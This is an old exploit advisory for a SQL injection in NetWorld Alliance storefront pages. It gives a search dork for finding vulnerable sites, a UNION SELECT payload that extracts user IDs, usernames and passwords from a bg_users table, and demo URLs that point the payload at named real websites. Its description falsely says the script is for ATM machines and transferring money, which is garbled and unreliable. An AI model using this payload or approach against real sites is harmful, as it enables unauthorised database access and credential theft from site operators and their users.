# Exploit Title:   NetWorld Alliance SQL InJection
# Date: 27/06/2010
# Author: dev!l ghost
# Email: aws(at)live(dot)it
# Site : www.vbspiders.com
# Script url: http://www.networldalliance.com/2010-digital-signage-future-trends-report
# Price: US$797.00 
# Version: N/A
# Tested on: Windows
# CVE : ()
  
:::::::::::::::::::::::::
  
  
=================Exploit=================
Descript: This Script Is For ATM Machine And How To use it and give and 
get and transfer money from it 
it is private script

---DorK:("© 2010 NetWorld Alliance")---

You will get a lot of sites  enter any site
and then Put this (storefronts.php?sf_id=any number)
after id put any number and start inject
 


----exploit----   

{{exploit}}
http://www.xxxxxx.com/storefronts.php?sf_id=(39)  --SQLI--
after the number put this 
(+union+all+select+1,concat(id,0x3a,username,0x3a,password)+from+bg_users--)

DeMo1
https://www.kioskmarketplace.com/storefronts.php?sf_id=-39+union+all+select+1,concat(id,0x3a,username,0x3a,password)+from+bg_users--

DeMo2
http://www.digitalsignagetoday.com/storefronts.php?sf_id=-243+union+all+select+1,concat(id,0x3a,username,0x3a,password)+from+bg_users--
---------greatz----------
Greatz to all my frinds and the all muslims 
and Golden Ice and mr.ip
and the all who know me
And VBspiders 

thank you 		 	   		  
_________________________________________________________________
Hotmail: Trusted email with Microsoft’s powerful SPAM protection.
https://signup.live.com/signup.aspx?id=60969